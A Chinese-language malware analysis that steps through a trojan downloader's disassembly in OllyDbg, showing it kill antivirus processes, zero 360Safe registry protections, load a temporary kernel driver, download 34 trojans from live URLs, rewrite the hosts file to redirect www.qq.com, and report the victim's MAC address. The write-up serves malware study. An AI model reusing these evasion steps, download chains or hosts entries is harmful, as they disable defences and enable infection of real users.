这个东东有个UPX壳,脱壳就不多说了,脱完壳载入OD:
00412EF0 |. E8 85FFFFFF call 00412E7A ; (initial cpu selection)
00412EF5 |. 83F8 0A cmp eax, 0A
00412EF8 |. 72 3F jb short 00412F39
00412EFA |. 56 push esi
00412EFB |. BE 88304100 mov esi, 00413088 ; c:\docume~1\admini~1\locals~1\temp\78767551
00412F00 |. 56 push esi ; /Buffer => 123_.00413088
00412F01 |. 68 04010000 push 104 ; |BufSize = 104 (260.)
00412F06 |. FF15 94104000 call dword ptr [<&kernel32.GetTempPa>; \GetTempPathA
00412F0C |. 68 20194100 push 00411920 ; /78767551
00412F11 |. 56 push esi ; |ConcatString => ""
00412F12 |. FF15 58104000 call dword ptr [<&kernel32.lstrcat>] ; \lstrcatA
查找临时文件夹:
00412CCC |. 6A 00 push 0 ; /hTemplateFile = NULL
00412CCE |. 6A 00 push 0 ; |Attributes = 0
00412CD0 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00412CD2 |. 6A 00 push 0 ; |pSecurity = NULL
00412CD4 |. 6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
00412CD6 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
00412CDB |. 50 push eax ; |FileName
00412CDC |. 32DB xor bl, bl ; |
00412CDE |. FF15 A8104000 call dword ptr [<&kernel32.C>; \CreateFileA
00412CE4 |. 8BF0 mov esi, eax
00412CE6 |. 83FE FF cmp esi, -1
00412CE9 |. 75 00 jnz short 00412CEB
00412CEB |> 8D4C24 08 lea ecx, dword ptr [esp+8]
00412CEF |. 6A 00 push 0 ; /pOverlapped = NULL
00412CF1 |. 51 push ecx ; |pBytesWritten
00412CF2 |. 68 00250000 push 2500 ; |nBytesToWrite = 2500 (9472.)
00412CF7 |. 68 B0BE4000 push 0040BEB0 ; |Buffer = 123_.0040BEB0
00412CFC |. 56 push esi ; |hFile
00412CFD |. FF15 AC104000 call dword ptr [<&kernel32.W>; \WriteFile
临时文件夹创建文件:78767551
然后解密0040BD0C - 0040BE94这一段数据,得到要结束的进程列表:
kavstart.exe、kissvc.exe、kmailmon.exe、kpfw32.exe、kpfwsvc.exe、kwatch.exe、ccenter.exe、ras.exe、rstray.exe、rsagent.exe、ravtask.exe、ravstub.exe、ravmon.exe、ravmond.exe、avp.exe、360safebox.exe、360Safe.exe、Thunder5.exe、rfwmain.exe、rfwstub.exe、rfwsrv.exe
解密过程大致是:取字母的位数减去21H,左移一位,再加上加密后字符串中对应字符的ASCII码值
如果发现360进程,修改注册表:[HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon]
"MonAccess"=dword:00000000
"SiteAccess"=dword:00000000
"ExecAccess"=dword:00000000
"ARPAccess"=dword:00000000
"weeken"=dword:00000000
"IEProtAccess"=dword:00000000
"LeakShowed"=dword:00000001
"UDiskAccess"=dword:00000001
可能这可以过360吧,没试验,呵呵
00412C37 |. 56 push esi ; /Password
00412C38 |. 56 push esi ; |ServiceStartName
00412C39 |. 56 push esi ; |pDependencies
00412C3A |. 56 push esi ; |pTagId
00412C3B |. 56 push esi ; |LoadOrderGroup
00412C3C |. FF75 0C push dword ptr [ebp+C] ; |BinaryPathName
00412C3F |. 6A 01 push 1 ; |ErrorControl = SERVICE_ERROR_NORMAL
00412C41 |. 6A 03 push 3 ; |StartType = SERVICE_DEMAND_START
00412C43 |. 6A 01 push 1 ; |ServiceType = SERVICE_KERNEL_DRIVER
00412C45 |. 68 FF010F00 push 0F01FF ; |DesiredAccess = SERVICE_ALL_ACCESS
00412C4A |. FF75 08 push dword ptr [ebp+8] ; |DisplayName
00412C4D |. FF75 08 push dword ptr [ebp+8] ; |ServiceName
00412C50 |. FF75 FC push dword ptr [ebp-4] ; |hManager
00412C53 |. FF15 20104000 call dword ptr [<&advapi>; \CreateServiceA
创建服务:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kisstusb
服务指向临时文件夹中的78767551(ServiceType = 1,即作为内核驱动加载):
00412D56 |. FF15 24104000 call dword ptr [<&advapi>; advapi32.StartServiceA
00412D5C |> 56 push esi
00412D5D |. FF15 00104000 call dword ptr [<&advapi>; advapi32.CloseServiceHandle
00412D63 |> FF75 08 push dword ptr [ebp+8] ; /FileName
00412D66 |. FF15 48104000 call dword ptr [<&kernel>; \DeleteFileA
00412D6C |. 68 D4184100 push 004118D4 ; /system\currentcontrolset\services\kisstusb
00412D71 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00412D76 |. FF15 EC104000 call dword ptr [<&shlwap>; \SHDeleteKeyA
启动服务,然后删除文件和服务,清理挺干净,呵呵
004129A3 |. 50 push eax ; /Buffer
004129A4 |. 68 04010000 push 104 ; |BufSize = 104 (260.)
004129A9 |. FF15 94104000 call dword ptr [<&kern>; \GetTempPathA
004129AF |. FF15 98104000 call dword ptr [<&kern>; [GetTickCount
004129B5 |. 50 push eax ; /<%x>
004129B6 |. 8D85 FCFEFFFF lea eax, dword ptr [e>; |
004129BC |. 50 push eax ; |<%s>
004129BD |. BE 7C2F4100 mov esi, 00412F7C ; |ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\6c0070.dll"
004129C2 |. 68 B4184100 push 004118B4 ; |%s%x.dll
004129C7 |. 56 push esi ; |s => 123_.00412F7C
004129C8 |. FF15 04114000 call dword ptr [<&user>; \wsprintfA
临时文件夹创建一个随机名的dll(文件名由GetTickCount的返回值按%s%x.dll格式拼出),作用是运行下载的木马。
004124CC |. 68 4C184100 push 0041184C ; /urlmon.dll
004124D1 |. FF15 A0104000 call dword ptr [<&kernel32.>; \LoadLibraryA
004124D7 |. 68 38184100 push 00411838 ; /urldownloadtofilea
004124DC |. 50 push eax ; |hModule
004124DD |. A3 8C314100 mov dword ptr [41318C], ea>; |
004124E2 |. FF15 A4104000 call dword ptr [<&kernel32.>; \GetProcAddress
00411F98 |. FF75 08 push dword ptr [ebp+8] ; |s = "http://www.fengtianc.cn/ko.txt"
读取http://www.fengtianc.cn/ko.txt下载木马,ko.txt内容如下:
[file]
open=y
url1=http://111.gxfcd.cn/new/new1.exe
………………
url34=http://111.gxfcd.cn/new/new34.exe
count=34
有34个之多强悍啊,呵呵。
0041203E |. 68 04010000 push 104 ; /BufSize = 104 (260.)
00412043 |. 50 push eax ; |Buffer
00412044 |. FF15 90104000 call dword ptr [<&kernel32.>; \GetSystemDirectoryA
0041204A |. BF 04184100 mov edi, 00411804 ; \sadfasdf.jpg
系统目录写入sadfasdf.jpg,虚拟机没联网,貌似没创建成功。
00412957 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
0041295C |. 50 push eax ; |Buffer
0041295D |. FF15 90104000 call dword ptr [<&ker>; \GetSystemDirectoryA
00412963 |. 8D85 FCFEFFFF lea eax, dword ptr [>
00412969 |. 68 A0184100 push 004118A0 ; /\drivers\etc\hosts
0041296E |. 50 push eax ; |ConcatString
0041296F |. FF15 58104000 call dword ptr [<&ker>; \lstrcatA
00412975 |. 8D85 FCFEFFFF lea eax, dword ptr [>
0041297B |. 50 push eax
0041297C |. 68 78030000 push 378
00412981 |. 68 84164100 push 00411684 ; ASCII "http://www.fengtianc.cn/ad.jpg"
下载后改写为hosts文件,这个jpg其实是个txt文档,内容如下(注意最后一条不是回环地址,而是把www.qq.com解析到119.206.206.54):
127.0.0.1 v.onondown.com.cn
127.0.0.2 ymsdasdw1.cn
127.0.0.3 h96b.info
127.0.0.0 fuck.zttwp.cn
127.0.0.0 www.hackerbf.cn
127.0.0.0 geekbyfeng.cn
127.0.0.0 121.14.101.68
127.0.0.0 ppp.etimes888.com
127.0.0.0 www.bypk.com
127.0.0.0 CSC3-2004-crl.verisign.com
127.0.0.1 va9sdhun23.cn
127.0.0.0 udp.hjob123.com
127.0.0.2 bnasnd83nd.cn
127.0.0.0 www.gamehacker.com.cn
127.0.0.0 gamehacker.com.cn
127.1.1.1 www.cctv-100008.cn
127.1.1.1 222.73.208.141
127.0.0.3 adlaji.cn
127.1.1.1 aiyyw.com
127.0.0.1 858656.com
127.1.1.1 bnasnd83nd.cn
127.0.0.1 my123.com
127.0.0.0 user1.12-27.net
127.0.0.1 8749.com
127.0.0.0 fengent.cn
127.0.0.1 4199.com
127.0.0.1 user1.16-22.net
127.0.0.1 7379.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
127.0.0.1 7255.com
127.0.0.1 user1.23-12.net
127.0.0.1 3448.com
127.0.0.1 www.guccia.net
127.0.0.1 7939.com
127.0.0.1 a.o1o1o1.nEt
127.0.0.1 8009.com
127.0.0.1 user1.12-73.cn
127.0.0.1 piaoxue.com
127.0.0.1 3n8nlasd.cn
127.0.0.1 kzdh.com
127.0.0.0 www.sony888.cn
127.0.0.1 about.blank.la
127.0.0.0 user1.asp-33.cn
127.0.0.1 6781.com
127.0.0.0 www.netkwek.cn
127.0.0.1 7322.com
127.0.0.0 ymsdkad6.cn
127.0.0.1 localhost
127.0.0.0 www.lkwueir.cn
127.0.0.1 06.jacai.com
127.0.1.1 user1.23-17.net
127.0.0.1 1.jopenkk.com
127.0.0.0 upa.luzhiai.net
127.0.0.1 1.jopenqc.com
127.0.0.0 www.guccia.net
127.0.0.1 1.joppnqq.com
127.0.0.0 4m9mnlmi.cn
127.0.0.1 1.xqhgm.com
127.0.0.0 mm119mkssd.cn
127.0.0.1 100.332233.com
127.0.0.0 61.128.171.115:8080
127.0.0.1 121.11.90.79
127.0.0.0 www.1119111.com
127.0.0.1 121565.net
127.0.0.0 win.nihao69.cn
127.0.0.1 125.90.88.38
127.0.0.1 16888.6to23.com
127.0.0.1 2.joppnqq.com
127.0.0.0 puc.lianxiac.net
127.0.0.1 204.177.92.68
127.0.0.0 pud.lianxiac.net
127.0.0.1 210.74.145.236
127.0.0.0 210.76.0.133
127.0.0.1 219.129.239.220
127.0.0.0 61.166.32.2
127.0.0.1 219.153.40.221
127.0.0.0 218.92.186.27
127.0.0.1 219.153.46.27
127.0.0.0 www.fsfsfag.cn
127.0.0.1 219.153.52.123
127.0.0.0 ovo.ovovov.cn
127.0.0.1 221.195.42.71
127.0.0.0 dw.com.com
127.0.0.1 222.73.218.115
127.0.0.1 203.110.168.233:80
127.0.0.1 3.joppnqq.com
127.0.0.1 203.110.168.221:80
127.0.0.1 363xx.com
127.0.0.1 www1.ip10086.com.cm
127.0.0.1 4199.com
127.0.0.1 blog.ip10086.com.cn
127.0.0.1 43242.com
127.0.0.1 www.ccji68.cn
127.0.0.1 5.xqhgm.com
127.0.0.0 t.myblank.cn
127.0.0.1 520.mm5208.com
127.0.0.0 x.myblank.cn
127.0.0.1 59.34.131.54
127.0.0.1 210.51.45.5
127.0.0.1 59.34.198.228
127.0.0.1 www.ew1q.cn
127.0.0.1 59.34.198.88
127.0.0.1 59.34.198.97
127.0.0.1 60.190.114.101
127.0.0.1 60.190.218.34
127.0.0.0 qq-xing.com.cn
127.0.0.1 60.191.124.252
127.0.0.1 61.145.117.212
127.0.0.1 61.157.109.222
127.0.0.1 75.126.3.216
127.0.0.1 75.126.3.217
127.0.0.1 75.126.3.218
127.0.0.0 59.125.231.177:17777
127.0.0.1 75.126.3.220
127.0.0.1 75.126.3.221
127.0.0.1 75.126.3.222
127.0.0.1 772630.com
127.0.0.1 832823.cn
127.0.0.1 8749.com
127.0.0.1 888.jopenqc.com
127.0.0.1 89382.cn
127.0.0.1 8v8.biz
127.0.0.1 97725.com
127.0.0.1 9gg.biz
127.0.0.1 www.9000music.com
127.0.0.1 test.591jx.com
127.0.0.1 a.topxxxx.cn
127.0.0.1 picon.chinaren.com
127.0.0.1 www.5566.net
127.0.0.1 p.qqkx.com
127.0.0.1 news.netandtv.com
127.0.0.1 z.neter888.cn
127.0.0.1 b.myblank.cn
127.0.0.1 wvw.wokutu.com
127.0.0.1 unionch.qyule.com
127.0.0.1 www.qyule.com
127.0.0.1 it.itjc.cn
127.0.0.1 www.linkwww.com
127.0.0.1 vod.kaicn.com
127.0.0.1 www.tx8688.com
127.0.0.1 b.neter888.cn
127.0.0.1 promote.huanqiu.com
127.0.0.1 www.huanqiu.com
127.0.0.1 www.haokanla.com
127.0.0.1 play.unionsky.cn
127.0.0.1 www.52v.com
127.0.0.1 www.gghka.cn
127.0.0.1 icon.ajiang.net
127.0.0.1 new.ete.cn
127.0.0.1 www.stiae.cn
127.0.0.1 o.neter888.cn
127.0.0.1 comm.jinti.com
127.0.0.1 www.google-analytics.com
127.0.0.1 hz.mmstat.com
127.0.0.1 www.game175.cn
127.0.0.1 x.neter888.cn
127.0.0.1 z.neter888.cn
127.0.0.1 p.etimes888.com
127.0.0.1 hx.etimes888.com
127.0.0.1 abc.qqkx.com
127.0.0.1 dm.popdm.cn
127.0.0.1 www.yl9999.com
127.0.0.1 www.dajiadoushe.cn
127.0.0.1 v.onondown.com.cn
127.0.0.1 www.interoo.net
127.0.0.1 bally1.bally-bally.net
127.0.0.1 www.bao5605509.cn
127.0.0.1 www.rty456.cn
127.0.0.1 www.werqwer.cn
127.0.0.1 1.360-1.cn
127.0.0.1 user1.23-16.net
127.0.0.1 www.guccia.net
127.0.0.1 www.interoo.net
127.0.0.1 upa.netsool.net
127.0.0.1 js.users.51.la
127.0.0.1 vip2.51.la
127.0.0.1 web.51.la
127.0.0.1 qq.gong2008.com
127.0.0.1 2008tl.copyip.com
127.0.0.1 tla.laozihuolaile.cn
127.0.0.1 www.tx6868.cn
127.0.0.1 p001.tiloaiai.com
127.0.0.1 s1.tl8tl.com
127.0.0.1 s1.gong2008.com
127.0.0.1 4b3ce56f9g.3f6e2cc5f0b.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
119.206.206.54 www.qq.com
最后是统计功能:
00411C68 |. 50 push eax ; /<%02X>
00411C69 |. 8B35 04114000 mov esi, dword ptr [<&user32.wsprin>; |USER32.wsprintfA
00411C6F |. 0FB685 6CFCFF>movzx eax, byte ptr [ebp-394] ; |
00411C76 |. 50 push eax ; |<%02X>
00411C77 |. 0FB685 6BFCFF>movzx eax, byte ptr [ebp-395] ; |
00411C7E |. 50 push eax ; |<%02X>
00411C7F |. 0FB685 6AFCFF>movzx eax, byte ptr [ebp-396] ; |
00411C86 |. 50 push eax ; |<%02X>
00411C87 |. 0FB685 69FCFF>movzx eax, byte ptr [ebp-397] ; |
00411C8E |. 50 push eax ; |<%02X>
00411C8F |. 0FB685 68FCFF>movzx eax, byte ptr [ebp-398] ; |
00411C96 |. 50 push eax ; |<%02X>
00411C97 |. 68 54174100 push 00411754 ; |%02x-%02x-%02x-%02x-%02x-%02x
00411C9C |. FF75 08 push dword ptr [ebp+8] ; |s
00411C9F |. FFD6 call esi ; \wsprintfA
打开网址http://tongji.ombb888.cn/getmac.asp?x=网卡地址&y=a320&t=1002488
后面两个参数应该是标志,完!